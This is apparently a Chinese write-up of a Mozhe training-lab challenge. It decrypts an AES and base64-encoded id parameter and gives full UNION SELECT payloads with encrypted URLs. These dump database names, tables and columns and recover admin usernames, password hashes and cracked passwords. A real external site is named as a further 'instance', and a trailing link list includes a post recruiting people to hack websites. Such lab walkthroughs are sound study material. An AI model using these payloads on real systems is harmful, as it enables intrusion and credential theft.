AES加密SQL参数靶场练习

资源路径: 墨者学院-在线靶场-数据库安全-SQL注入漏洞测试(参数加密)

技能要求: 信息泄露方式+AES加解密+PHP语法+手工SQL注入+mysql数据库结构

目标: 通过SQL注入方式,获取WEB业务系统的账号密码进行登录。

通关测试:

首先访问目标

使用AWVS先扫一遍:http://219.153.49.228:41606

使用浏览器访问扫描到的URL:
http://219.153.49.228:41606/news/list.php?id=ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09

然后访问 http://219.153.49.228:41606/news,可以看到一个list.zip文件,下载

解压之后是一个list.php文件,内容如下:

加密方式为AES加密,然后再进行base64加密,因此将上述的id值(ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09)解密,先通过base64解密(eII8c3JeL0t0dxM7wb3Nzg==),然后再进行AES解密,可以得到值为1_mozhe

后面判断语句则是:先对通过?id=注入的数据解密得到明文进行判断是否后六个字符为_mozhe,因此可以据此构造sql语句
联合查询: -1 union select 1,2,3_mozhe,报错
sql语句: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDdFI5aFpFcFUxTkUrL0JJd2JYSHlLbz0=

通过测试可知payload应为-1 union select 1,2,3,4_mozhe
AES加密结果: xgd58ipTrnx8VzSBJicqCo3+zFFzhay5byFU3cjbdeI=
base加密结果:
eGdkNThpcFRybng4VnpTQkppY3FDbzMrekZGemhheTVieUZVM2NqYmRlST0=
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDbzMrekZGemhheTVieUZVM2NqYmRlST0=

有回显2,3,因此存在SQL注入漏洞,可以进行SQL注入

数据库查询:

payload: -1 union select 1,database(),3,4_mozhe
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDa2ZhOGJhWTFnQy9yYm9uL2JvZVdSdGM1eUdzNk5KUi91d1RDL1I2MWRYSQ==
得到数据库名: mozhe_Discuz_StormGroup

数据库中的表查询:
payload: -1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=“mozhe_Discuz_StormGroup”_mozhe
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDdG54VWtMbVR5VEJBa1lxMFlvdEIrMlRVbHhpYVpIeitwRlhKSkFqazd3N21XYTFoOGJ1V1ZtMUwxRm56SkJ5VVU3S0FYeGFIbDkyd0xBS1VyR2FiekxGaExqT0tWR3d4cFpWV1dqaHRSOVdqazFyV1Nnb3JPOWJNeXk3UnhEREVhckhTcFpxbTZSNSt4dFBBRmJ1QXhnZHdDZkMvT0VVdGFmK2ZlTjRSc0xq
得到表名: StormGroup_member,notice

字段名查询
-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=“StormGroup_member”_mozhe
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDdXZ6d1EwNGthL1B1YkJOa0tKeUpFVFV3L3phV0d6QUtiajhvTTFSUWJoV0JaYXRCVWt1WWUreiswdDhJbnpLUXg2N2xuMHJMb2hJM0NWVWtrWlZuRGs3VGVUUHgwS1Y1VDg1ZFVxdy9ZcUN0M3lITk8rTVorRlppNTZBTExqSjdMMU45bTl4alVCUzg5ZFhERVRBSVZNPQ==
得到各字段名: id,name,password,status

字段内容查询:
payload: -1 union select 1,group_concat(name,%3a,password),3,4 from StormGroup_member_mozhe
url: http://219.153.49.228:41606/news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDcktrNkQ2cFlZbEZQUFFiOWpHYlZrVDZTcTM0MWRVQStqQWVoeUFzRkdFTWtkR0VCeCt0Y1NkMDFHeFI3MW9RSWNlTlNGOUxpMnRudHRpc3g3cGhmRkk9
得到各字段内容:
mozhe356f589a7df439f6f744ff19bb8092c0,mozhee67edd40790332ed0ff9e137f3bca069
MD5解密: mozhe: dsan13 mozhe: 911208

登陆网站后台

Base64加密SQL参数实例分析

实例站点: https://www.inkomet.com/detail.php?id=MQ==

数值1用base64编码为:MQ==

数值2用base64编码为:Mg==

SQL注入防御之参数加密相关推荐

  1. SQL注入防御之二——注入关键词过滤(PHP)

    SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 概述   欢迎来到本人的SQL注入防御系列的第二篇文章, ...

  2. hibernate防止sql注入对参数赋值传参数的例子

    来源于:https://my.oschina.net/u/1754093/blog/707083 1.按参数名称绑定 在HQL语句中定义命名参数要用":"开头,形式如下: Quer ...

  3. 网络安全之SQL注入

    文章目录 SQL注入的定义 SQL注入为什么会成功? 为什么发生SQL注入? SQL注入的分析 SQL的注入流程 判断SQL注入点 判断注入类型 SQL注入的通常方法 防止SQL注入 SQL注入的定义 ...

  4. 本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)

    目录 注册登录模块 源码 测试 源码加固 文件上传模块 源码 测试 源码加固 发布动态模块 源码 测试 源码加固 本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解. 源码:利用PHP开发具 ...

  5. web 漏洞入门之 —— SQL 注入教程

    SQL 注入是最常见.最被人们熟知的 web 漏洞.根据百科的解释:所谓SQL注入,就是通过把SQL命令,插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. ...

  6. mysql注入漏洞语句,web安全之sql注入漏洞

    概念 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.通俗地讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力 ...

  7. 从sql注入到getshell (内附sqlmap的os-shell遇到中文路径的解决办法)

    `搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员--君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文 ...

  8. 2022-10-10(通达OA SQL注入漏洞)

    文章目录 漏洞描述 环境搭建 漏洞利用 id参数存在sql注入 starttime参数 orderby参数 id参数存在sql注入 修复建议 参考 漏洞描述 通达OA 11.5版本,存在sql注入 环 ...

  9. asp.net 全局sql注入处理 sql关键字过滤 global过滤sql

    asp.net 全局sql注入处理 sql关键字过滤 global //当前请求对象private HttpRequest request;//当前响应对象private HttpResponse r ...

最新文章

  1. 加州理工让无人机长出腿:走路飞行无缝切换,还能玩滑板、走钢丝|Sicence子刊...
  2. AJAX框架构成设计,基于Ajax的Web框架设计与实现
  3. java string类型_java中String类型
  4. wav2midi 音乐旋律提取算法 附可执行demo
  5. serialization机制
  6. 关于c语言字符串函数和一些内存函数的的简介
  7. 安卓手机挂载Linux,android 挂载NFS教程
  8. 【AD】mm,mile,inch+电流大小同线宽关系
  9. perl的几个小tips
  10. 【图像评价】基于matlab图像去雾质量评价【含Matlab源码 066期】
  11. 中控考勤机官方开发包java,zkteco iface702 中控考勤机java开发步骤一---连接考勤机...
  12. Sklearn官方文档中文整理4——随机梯度下降和最近邻篇
  13. 计算机机房防火门,弱电机房门为防火门吗
  14. hadoop - hadoop2.6 伪分布式 示例 wordcount 分词 和 hdfs常用操作命令
  15. SkeyeVSS将安防网络摄像机进行类似于萤石云、乐橙云等模式的互联网视频云直播的几种方案
  16. 英伟达DeepStream学习笔记45——deepstream 绘制感兴趣ROI区域 绘制矩形框
  17. 微信小程序测试过程中的各个要点(干货)
  18. 硅片检测半导体运动台控制器的设计
  19. AT指令EGMR-修改设备的IMEI号码
  20. ColdQuanta与Classiq达成合作:加速100量子比特计算机实用化

热门文章

  1. EfficientDet(BiFPN)(CVPR 2020)
  2. 远程桌面的内容无法复制粘贴到本地的解决办法
  3. YUI3 event-base
  4. IIS网站404失效
  5. OS2.2.5:调度算法之时间片轮转调度、优先级调度、多级反馈队列调度
  6. vue网络图片url转Base64
  7. GT-suite v2016解决许可证过期问题(附新版liscense下载地址)
  8. 在赛灵思 Xilinx Vivado 中利用 report_qor_suggestions 提升 QoR
  9. java.lang.NullPointerException:null
  10. 寻找黑道高手一起黑网站玩